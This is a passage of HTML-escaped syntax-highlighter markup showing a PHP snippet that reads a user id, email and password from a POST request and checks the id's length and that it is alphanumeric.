!important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_POST&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'uid'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$umail&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_POST&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'umail'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a8d450214921-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$_POST&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'upw'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$upw&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$umail&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a8d450214921-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id too short&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;16&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id too long&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a8d450214921-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ctype_alnum&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$uid&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;id must be alnum!&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a8d450214921-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; 